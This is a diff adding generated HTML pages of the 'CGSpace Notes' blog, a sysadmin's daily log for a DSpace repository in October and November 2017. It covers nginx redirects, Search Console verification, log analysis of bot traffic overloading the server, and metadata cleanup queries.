+<li>I manually checked a dozen of them and it appeared that the correct handle was always the second one, so I just deleted the first one</li>
+</ul>
+<h2 id="2017-10-06">2017-10-06</h2>
+<ul>
+<li>I saw a nice tweak to thumbnail presentation on the Cardiff Metropolitan University DSpace: <a href="https://repository.cardiffmet.ac.uk/handle/10369/8780">https://repository.cardiffmet.ac.uk/handle/10369/8780</a></li>
+<li>It adds a subtle border and box shadow, before and after:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/10/dspace-thumbnail-original.png" alt="Original flat thumbnails">
+<img src="/cgspace-notes/2017/10/dspace-thumbnail-box-shadow.png" alt="Tweaked with border and box shadow"></p>
+<ul>
+<li>I&rsquo;ll post it to the Yammer group to see what people think</li>
+<li>I figured out at way to do the HTML verification for Google Search console for library.cgiar.org</li>
+<li>We can drop the HTML file in their XMLUI theme folder and it will get copied to the webapps directory during build/install</li>
+<li>Then we add an nginx alias for that URL in the library.cgiar.org vhost</li>
+<li>This method is kinda a hack but at least we can put all the pieces into git to be reproducible</li>
+<li>I will tell Tunji to send me the verification file</li>
+</ul>
+<h2 id="2017-10-10">2017-10-10</h2>
+<ul>
+<li>Deploy logic to allow verification of the library.cgiar.org domain in the Google Search Console (<a href="https://github.com/ilri/DSpace/pull/343">#343</a>)</li>
+<li>After verifying both the HTTP and HTTPS domains and submitting a sitemap it will be interesting to see how the stats in the console as well as the search results change (currently 28,500 results):</li>
+</ul>
+<p><img src="/cgspace-notes/2017/10/google-search-console.png" alt="Google Search Console">
+<img src="/cgspace-notes/2017/10/google-search-console-2.png" alt="Google Search Console 2">
+<img src="/cgspace-notes/2017/10/google-search-results.png" alt="Google Search results"></p>
+<ul>
+<li>I tried to submit a &ldquo;Change of Address&rdquo; request in the Google Search Console but I need to be an owner on CGSpace&rsquo;s console (currently I&rsquo;m just a user) in order to do that</li>
+<li>Manually clean up some communities and collections that Peter had requested a few weeks ago</li>
+<li>Delete Community 10568/102 (ILRI Research and Development Issues)</li>
+<li>Move five collections to 10568/27629 (ILRI Projects) using <code>move-collections.sh</code> with the following configuration:</li>
+</ul>
+<pre tabindex="0"><code>10568/1637 10568/174 10568/27629
+10568/1642 10568/174 10568/27629
+10568/1614 10568/174 10568/27629
+10568/75561 10568/150 10568/27629
+10568/183 10568/230 10568/27629
+</code></pre><ul>
+<li>Delete community 10568/174 (Sustainable livestock futures)</li>
+<li>Delete collections in 10568/27629 that have zero items (33 of them!)</li>
+</ul>
+<h2 id="2017-10-11">2017-10-11</h2>
+<ul>
+<li>Peter added me as an owner on the CGSpace property on Google Search Console and I tried to submit a &ldquo;Change of Address&rdquo; request for the CGIAR Library but got an error:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/10/search-console-change-address-error.png" alt="Change of Address error"></p>
+<ul>
+<li>We are sending top-level CGIAR Library traffic to their specific community hierarchy in CGSpace so this type of change of address won&rsquo;t work—we&rsquo;ll just need to wait for Google to slowly index everything and take note of the HTTP 301 redirects</li>
+<li>Also the Google Search Console doesn&rsquo;t work very well with Google Analytics being blocked, so I had to turn off my ad blocker to get the &ldquo;Change of Address&rdquo; tool to work!</li>
+</ul>
+<h2 id="2017-10-12">2017-10-12</h2>
+<ul>
+<li>Finally finish (I think) working on the myriad nginx redirects for all the CGIAR Library browse stuff—it ended up getting pretty complicated!</li>
+<li>I still need to commit the DSpace changes (add browse index, XMLUI strings, Discovery index, etc), but I should be able to deploy that on CGSpace soon</li>
+</ul>
+<h2 id="2017-10-14">2017-10-14</h2>
+<ul>
+<li>Run system updates on DSpace Test and reboot server</li>
+<li>Merge changes adding a search/browse index for CGIAR System subject to <code>5_x-prod</code> (<a href="https://github.com/ilri/DSpace/pull/344">#344</a>)</li>
+<li>I checked the top browse links in Google&rsquo;s search results for <code>site:library.cgiar.org inurl:browse</code> and they are all redirected appropriately by the nginx rewrites I worked on last week</li>
+</ul>
+<h2 id="2017-10-22">2017-10-22</h2>
+<ul>
+<li>Run system updates on DSpace Test and reboot server</li>
+<li>Re-deploy CGSpace from latest <code>5_x-prod</code> (adds ISI Journal to search filters and adds Discovery index for CGIAR Library <code>systemsubject</code>)</li>
+<li>Deploy nginx redirect fixes to catch CGIAR Library browse links (redirect to their community and translate subject→systemsubject)</li>
+<li>Run migration of CGSpace server (linode18) for Linode security alert, which took 42 minutes of downtime</li>
+</ul>
+<h2 id="2017-10-26">2017-10-26</h2>
+<ul>
+<li>In the last 24 hours we&rsquo;ve gotten a few alerts from Linode that there was high CPU and outgoing traffic on CGSpace</li>
+<li>Uptime Robot even noticed CGSpace go &ldquo;down&rdquo; for a few minutes</li>
+<li>In other news, I was trying to look at a question about stats raised by Magdalena and then CGSpace went down due to SQL connection pool</li>
+<li>Looking at the PostgreSQL activity I see there are 93 connections, but after a minute or two they went down and CGSpace came back up</li>
+<li>Annnd I reloaded the Atmire Usage Stats module and the connections shot back up and CGSpace went down again</li>
+<li>Still not sure where the load is coming from right now, but it&rsquo;s clear why there were so many alerts yesterday on the 25th!</li>
+</ul>
+<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-25 | sort -n | uniq | wc -l
+18022
+</code></pre><ul>
+<li>Compared to other days there were two or three times the number of requests yesterday!</li>
+</ul>
+<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-23 | sort -n | uniq | wc -l
+3141
+# grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-26 | sort -n | uniq | wc -l
+7851
+</code></pre><ul>
+<li>I still have no idea what was causing the load to go up today</li>
+<li>I finally investigated Magdalena&rsquo;s issue with the item download stats and now I can&rsquo;t reproduce it: I get the same number of downloads reported in the stats widget on the item page, the &ldquo;Most Popular Items&rdquo; page, and in Usage Stats</li>
+<li>I think it might have been an issue with the statistics not being fresh</li>
+<li>I added the admin group for the systems organization to the admin role of the top-level community of CGSpace because I guess Sisay had forgotten</li>
+<li>Magdalena asked if there was a way to reuse data in item submissions where items have a lot of similar data</li>
+<li>I told her about the possibility to use per-collection item templates, and asked if her items in question were all from a single collection</li>
+<li>We&rsquo;ve never used it but it could be worth looking at</li>
+</ul>
+<h2 id="2017-10-27">2017-10-27</h2>
+<ul>
+<li>Linode alerted about high CPU usage again (twice) on CGSpace in the last 24 hours, around 2AM and 2PM</li>
+</ul>
+<h2 id="2017-10-28">2017-10-28</h2>
+<ul>
+<li>Linode alerted about high CPU usage again on CGSpace around 2AM this morning</li>
+</ul>
+<h2 id="2017-10-29">2017-10-29</h2>
+<ul>
+<li>Linode alerted about high CPU usage again on CGSpace around 2AM and 4AM</li>
+<li>I&rsquo;m still not sure why this started causing alerts so repeatadely the past week</li>
+<li>I don&rsquo;t see any tell tale signs in the REST or OAI logs, so trying to do rudimentary analysis in DSpace logs:</li>
+</ul>
+<pre tabindex="0"><code># grep &#39;2017-10-29 02:&#39; dspace.log.2017-10-29 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+2049
+</code></pre><ul>
+<li>So there were 2049 unique sessions during the hour of 2AM</li>
+<li>Looking at my notes, the number of unique sessions was about the same during the same hour on other days when there were no alerts</li>
+<li>I think I&rsquo;ll need to enable access logging in nginx to figure out what&rsquo;s going on</li>
+<li>After enabling logging on requests to XMLUI on <code>/</code> I see some new bot I&rsquo;ve never seen before:</li>
+</ul>
+<pre tabindex="0"><code>137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] &#34;GET /discover?filtertype_0=type&amp;filter_relational_operator_0=equals&amp;filter_0=Internal+Document&amp;filtertype=author&amp;filter_relational_operator=equals&amp;filter=CGIAR+Secretariat HTTP/1.1&#34; 200 7776 &#34;-&#34; &#34;Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)&#34;
+</code></pre><ul>
+<li>CORE seems to be some bot that is &ldquo;Aggregating the world’s open access research papers&rdquo;</li>
+<li>The contact address listed in their bot&rsquo;s user agent is incorrect, correct page is simply: <a href="https://core.ac.uk/contact">https://core.ac.uk/contact</a></li>
+<li>I will check the logs in a few days to see if they are harvesting us regularly, then add their bot&rsquo;s user agent to the Tomcat Crawler Session Valve</li>
+<li>After browsing the CORE site it seems that the CGIAR Library is somehow a member of CORE, so they have probably only been harvesting CGSpace since we did the migration, as library.cgiar.org directs to us now</li>
+<li>For now I will just contact them to have them update their contact info in the bot&rsquo;s user agent, but eventually I think I&rsquo;ll tell them to swap out the CGIAR Library entry for CGSpace</li>
+</ul>
+<h2 id="2017-10-30">2017-10-30</h2>
+<ul>
+<li>Like clock work, Linode alerted about high CPU usage on CGSpace again this morning (this time at 8:13 AM)</li>
+<li>Uptime Robot noticed that CGSpace went down around 10:15 AM, and I saw that there were 93 PostgreSQL connections:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT * FROM pg_stat_activity;
+...
+(93 rows)
+</code></pre><ul>
+<li>Surprise surprise, the CORE bot is likely responsible for the recent load issues, making hundreds of thousands of requests yesterday and today:</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#34;CORE/0.6&#34; /var/log/nginx/access.log 
+26475
+# grep -c &#34;CORE/0.6&#34; /var/log/nginx/access.log.1
+135083
+</code></pre><ul>
+<li>IP addresses for this bot currently seem to be:</li>
+</ul>
+<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq
+137.108.70.6
+137.108.70.7
+</code></pre><ul>
+<li>I will add their user agent to the Tomcat Session Crawler Valve but it won&rsquo;t help much because they are only using two sessions:</li>
+</ul>
+<pre tabindex="0"><code># grep 137.108.70 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq
+session_id=5771742CABA3D0780860B8DA81E0551B
+session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
+</code></pre><ul>
+<li>&hellip; and most of their requests are for dynamic discover pages:</li>
+</ul>
+<pre tabindex="0"><code># grep -c 137.108.70 /var/log/nginx/access.log
+26622
+# grep 137.108.70 /var/log/nginx/access.log | grep -c &#34;GET /discover&#34;
+24055
+</code></pre><ul>
+<li>Just because I&rsquo;m curious who the top IPs are:</li>
+</ul>
+<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
+    496 62.210.247.93
+    571 46.4.94.226
+    651 40.77.167.39
+    763 157.55.39.231
+    782 207.46.13.90
+    998 66.249.66.90
+   1948 104.196.152.243
+   4247 190.19.92.5
+  31602 137.108.70.6
+  31636 137.108.70.7
+</code></pre><ul>
+<li>At least we know the top two are CORE, but who are the others?</li>
+<li>190.19.92.5 is apparently in Argentina, and 104.196.152.243 is from Google Cloud Engine</li>
+<li>Actually, these two scrapers might be more responsible for the heavy load than the CORE bot, because they don&rsquo;t reuse their session variable, creating thousands of new sessions!</li>
+</ul>
+<pre tabindex="0"><code># grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+1419
+# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+2811
+</code></pre><ul>
+<li>From looking at the requests, it appears these are from CIAT and CCAFS</li>
+<li>I wonder if I could somehow instruct them to use a user agent so that we could apply a crawler session manager valve to them</li>
+<li>Actually, according to the Tomcat docs, we could use an IP with <code>crawlerIps</code>: <a href="https://tomcat.apache.org/tomcat-7.0-doc/config/valve.html#Crawler_Session_Manager_Valve">https://tomcat.apache.org/tomcat-7.0-doc/config/valve.html#Crawler_Session_Manager_Valve</a></li>
+<li>Ah, wait, it looks like <code>crawlerIps</code> only came in 2017-06, so probably isn&rsquo;t in Ubuntu 16.04&rsquo;s 7.0.68 build!</li>
+<li>That would explain the errors I was getting when trying to set it:</li>
+</ul>
+<pre tabindex="0"><code>WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property &#39;crawlerIps&#39; to &#39;190\.19\.92\.5|104\.196\.152\.243&#39; did not find a matching property.
+</code></pre><ul>
+<li>As for now, it actually seems the CORE bot coming from 137.108.70.6 and 137.108.70.7 is only using a few sessions per day, which is good:</li>
+</ul>
+<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)&#39; dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
+    410 session_id=74F0C3A133DBF1132E7EC30A7E7E0D60:ip_addr=137.108.70.7
+    574 session_id=5771742CABA3D0780860B8DA81E0551B:ip_addr=137.108.70.7
+   1012 session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A:ip_addr=137.108.70.6
+</code></pre><ul>
+<li>I will check again tomorrow</li>
+</ul>
+<h2 id="2017-10-31">2017-10-31</h2>
+<ul>
+<li>Very nice, Linode alerted that CGSpace had high CPU usage at 2AM again</li>
+<li>Ask on the dspace-tech mailing list if it&rsquo;s possible to use an existing item as a template for a new item</li>
+<li>To follow up on the CORE bot traffic, there were almost 300,000 request yesterday:</li>
+</ul>
+<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log.1 | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h
+ 139109 137.108.70.6
+ 139253 137.108.70.7
+</code></pre><ul>
+<li>I&rsquo;ve emailed the CORE people to ask if they can update the repository information from CGIAR Library to CGSpace</li>
+<li>Also, I asked if they could perhaps use the <code>sitemap.xml</code>, OAI-PMH, or REST APIs to index us more efficiently, because they mostly seem to be crawling the nearly endless Discovery facets</li>
+<li>I added <a href="https://goaccess.io/">GoAccess</a> to the list of package to install in the DSpace role of the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a></li>
+<li>It makes it very easy to analyze nginx logs from the command line, to see where traffic is coming from:</li>
+</ul>
+<pre tabindex="0"><code># goaccess /var/log/nginx/access.log --log-format=COMBINED
+</code></pre><ul>
+<li>According to Uptime Robot CGSpace went down and up a few times</li>
+<li>I had a look at goaccess and I saw that CORE was actively indexing</li>
+<li>Also, PostgreSQL connections were at 91 (with the max being 60 per web app, hmmm)</li>
+<li>I&rsquo;m really starting to get annoyed with these guys, and thinking about blocking their IP address for a few days to see if CGSpace becomes more stable</li>
+<li>Actually, come to think of it, they aren&rsquo;t even obeying <code>robots.txt</code>, because we actually disallow <code>/discover</code> and <code>/search-filter</code> URLs but they are hitting those massively:</li>
+</ul>
+<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log | grep -o -E &#34;GET /(discover|search-filter)&#34; | sort -n | uniq -c | sort -rn 
+ 158058 GET /discover
+  14260 GET /search-filter
+</code></pre><ul>
+<li>I tested a URL of pattern <code>/discover</code> in Google&rsquo;s webmaster tools and it was indeed identified as blocked</li>
+<li>I will send feedback to the CORE bot team</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2017-11/index.html b/docs/2017-11/index.html
new file mode 100644
index 000000000..0a5508788
--- /dev/null
+++ b/docs/2017-11/index.html
@@ -0,0 +1,998 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="November, 2017" />
+<meta property="og:description" content="2017-11-01
+
+The CORE developers responded to say they are looking into their bot not respecting our robots.txt
+
+2017-11-02
+
+Today there have been no hits by CORE and no alerts from Linode (coincidence?)
+
+# grep -c &#34;CORE&#34; /var/log/nginx/access.log
+0
+
+Generate list of authors on CGSpace for Peter to go through and correct:
+
+dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
+COPY 54701
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-11/" />
+<meta property="article:published_time" content="2017-11-02T09:37:54+02:00" />
+<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="November, 2017"/>
+<meta name="twitter:description" content="2017-11-01
+
+The CORE developers responded to say they are looking into their bot not respecting our robots.txt
+
+2017-11-02
+
+Today there have been no hits by CORE and no alerts from Linode (coincidence?)
+
+# grep -c &#34;CORE&#34; /var/log/nginx/access.log
+0
+
+Generate list of authors on CGSpace for Peter to go through and correct:
+
+dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
+COPY 54701
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "November, 2017",
+  "url": "https://alanorth.github.io/cgspace-notes/2017-11/",
+  "wordCount": "5428",
+  "datePublished": "2017-11-02T09:37:54+02:00",
+  "dateModified": "2019-10-28T13:39:25+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2017-11/">
+
+    <title>November, 2017 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-11/">November, 2017</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2017-11-02T09:37:54+02:00">Thu Nov 02, 2017</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2017-11-01">2017-11-01</h2>
+<ul>
+<li>The CORE developers responded to say they are looking into their bot not respecting our robots.txt</li>
+</ul>
+<h2 id="2017-11-02">2017-11-02</h2>
+<ul>
+<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log
+0
+</code></pre><ul>
+<li>Generate list of authors on CGSpace for Peter to go through and correct:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
+COPY 54701
+</code></pre><ul>
+<li>Abenet asked if it would be possible to generate a report of items in Listing and Reports that had &ldquo;International Fund for Agricultural Development&rdquo; as the <em>only</em> investor</li>
+<li>I opened a ticket with Atmire to ask if this was possible: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=540">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=540</a></li>
+<li>Work on making the thumbnails in the item view clickable</li>
+<li>Basically, once you read the METS XML for an item it becomes easy to trace the structure to find the bitstream link</li>
+</ul>
+<pre tabindex="0"><code>//mets:fileSec/mets:fileGrp[@USE=&#39;CONTENT&#39;]/mets:file/mets:FLocat[@LOCTYPE=&#39;URL&#39;]/@xlink:href
+</code></pre><ul>
+<li>METS XML is available for all items with this pattern: /metadata/handle/10568/95947/mets.xml</li>
+<li>I whipped up a quick hack to print a clickable link with this URL on the thumbnail but it needs to check a few corner cases, like when there is a thumbnail but no content bitstream!</li>
+<li>Help proof fifty-three CIAT records for Sisay: <a href="https://dspacetest.cgiar.org/handle/10568/95895">https://dspacetest.cgiar.org/handle/10568/95895</a></li>
+<li>A handful of issues with <code>cg.place</code> using format like &ldquo;Lima, PE&rdquo; instead of &ldquo;Lima, Peru&rdquo;</li>
+<li>Also, some dates like with completely invalid format like &ldquo;2010- 06&rdquo; and &ldquo;2011-3-28&rdquo;</li>
+<li>I also collapsed some consecutive whitespace on a handful of fields</li>
+</ul>
+<h2 id="2017-11-03">2017-11-03</h2>
+<ul>
+<li>Atmire got back to us to say that they estimate it will take two days of labor to implement the change to Listings and Reports</li>
+<li>I said I&rsquo;d ask Abenet if she wants that feature</li>
+</ul>
+<h2 id="2017-11-04">2017-11-04</h2>
+<ul>
+<li>I finished looking through Sisay&rsquo;s CIAT records for the &ldquo;Alianzas de Aprendizaje&rdquo; data</li>
+<li>I corrected about half of the authors to standardize them</li>
+<li>Linode emailed this morning to say that the CPU usage was high again, this time at 6:14AM</li>
+<li>It&rsquo;s the first time in a few days that this has happened</li>
+<li>I had a look to see what was going on, but it isn&rsquo;t the CORE bot:</li>
+</ul>
+<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
+    306 68.180.229.31
+    323 61.148.244.116
+    414 66.249.66.91
+    507 40.77.167.16
+    618 157.55.39.161
+    652 207.46.13.103
+    666 157.55.39.254
+   1173 104.196.152.243
+   1737 66.249.66.90
+  23101 138.201.52.218
+</code></pre><ul>
+<li>138.201.52.218 is from some Hetzner server, and I see it making 40,000 requests yesterday too, but none before that:</li>
+</ul>
+<pre tabindex="0"><code># zgrep -c 138.201.52.218 /var/log/nginx/access.log*
+/var/log/nginx/access.log:24403
+/var/log/nginx/access.log.1:45958
+/var/log/nginx/access.log.2.gz:0
+/var/log/nginx/access.log.3.gz:0
+/var/log/nginx/access.log.4.gz:0
+/var/log/nginx/access.log.5.gz:0
+/var/log/nginx/access.log.6.gz:0
+</code></pre><ul>
+<li>It&rsquo;s clearly a bot as it&rsquo;s making tens of thousands of requests, but it&rsquo;s using a &ldquo;normal&rdquo; user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+</code></pre><ul>
+<li>For now I don&rsquo;t know what this user is!</li>
+</ul>
+<h2 id="2017-11-05">2017-11-05</h2>
+<ul>
+<li>Peter asked if I could fix the appearance of &ldquo;International Livestock Research Institute&rdquo; in the author lookup during item submission</li>
+<li>It looks to be just an issue with the user interface expecting authors to have both a first and last name:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/11/author-lookup.png" alt="Author lookup">
+<img src="/cgspace-notes/2017/11/add-author.png" alt="Add author"></p>
+<ul>
+<li>But in the database the authors are correct (none with weird <code>, /</code> characters):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;International Livestock Research Institute%&#39;;
+                 text_value                 |              authority               | confidence 
+--------------------------------------------+--------------------------------------+------------
+ International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c |          0
+ International Livestock Research Institute | f4db1627-47cd-4699-b394-bab7eba6dadc |          0
+ International Livestock Research Institute |                                      |         -1
+ International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c |        600
+ International Livestock Research Institute | f4db1627-47cd-4699-b394-bab7eba6dadc |         -1
+ International Livestock Research Institute |                                      |        600
+ International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c |         -1
+ International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c |        500
+(8 rows)
+</code></pre><ul>
+<li>So I&rsquo;m not sure if this is just a graphical glitch or if editors have to edit this metadata field prior to approval</li>
+<li>Looking at monitoring Tomcat&rsquo;s JVM heap with Prometheus, it looks like we need to use JMX + <a href="https://github.com/prometheus/jmx_exporter">jmx_exporter</a></li>
+<li>This guide shows how to <a href="https://geekflare.com/enable-jmx-tomcat-to-monitor-administer/">enable JMX in Tomcat</a> by modifying <code>CATALINA_OPTS</code></li>
+<li>I was able to successfully connect to my local Tomcat with jconsole!</li>
+</ul>
+<h2 id="2017-11-07">2017-11-07</h2>
+<ul>
+<li>CGSpace when down and up a few times this morning, first around 3AM, then around 7</li>
+<li>Tsega had to restart Tomcat 7 to fix it temporarily</li>
+<li>I will start by looking at bot usage (access.log.1 includes usage until 6AM today):</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log.1 | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    619 65.49.68.184
+    840 65.49.68.199
+    924 66.249.66.91
+   1131 68.180.229.254
+   1583 66.249.66.90
+   1953 207.46.13.103
+   1999 207.46.13.80
+   2021 157.55.39.161
+   2034 207.46.13.36
+   4681 104.196.152.243
+</code></pre><ul>
+<li>104.196.152.243 seems to be a top scraper for a few weeks now:</li>
+</ul>
+<pre tabindex="0"><code># zgrep -c 104.196.152.243 /var/log/nginx/access.log*
+/var/log/nginx/access.log:336
+/var/log/nginx/access.log.1:4681
+/var/log/nginx/access.log.2.gz:3531
+/var/log/nginx/access.log.3.gz:3532
+/var/log/nginx/access.log.4.gz:5786
+/var/log/nginx/access.log.5.gz:8542
+/var/log/nginx/access.log.6.gz:6988
+/var/log/nginx/access.log.7.gz:7517
+/var/log/nginx/access.log.8.gz:7211
+/var/log/nginx/access.log.9.gz:2763
+</code></pre><ul>
+<li>This user is responsible for hundreds and sometimes thousands of Tomcat sessions:</li>
+</ul>
+<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+954
+$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+6199
+$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+7051
+</code></pre><ul>
+<li>The worst thing is that this user never specifies a user agent string so we can&rsquo;t lump it in with the other bots using the Tomcat Session Crawler Manager Valve</li>
+<li>They don&rsquo;t request dynamic URLs like &ldquo;/discover&rdquo; but they seem to be fetching handles from XMLUI instead of REST (and some with <code>//handle</code>, note the regex below):</li>
+</ul>
+<pre tabindex="0"><code># grep -c 104.196.152.243 /var/log/nginx/access.log.1
+4681
+# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P &#39;GET //?handle&#39;
+4618
+</code></pre><ul>
+<li>I just realized that <code>ciat.cgiar.org</code> points to 104.196.152.243, so I should contact Leroy from CIAT to see if we can change their scraping behavior</li>
+<li>The next IP (207.46.13.36) seem to be Microsoft&rsquo;s bingbot, but all its requests specify the &ldquo;bingbot&rdquo; user agent and there are no requests for dynamic URLs that are forbidden, like &ldquo;/discover&rdquo;:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c 207.46.13.36 /var/log/nginx/access.log.1 
+2034
+# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
+0
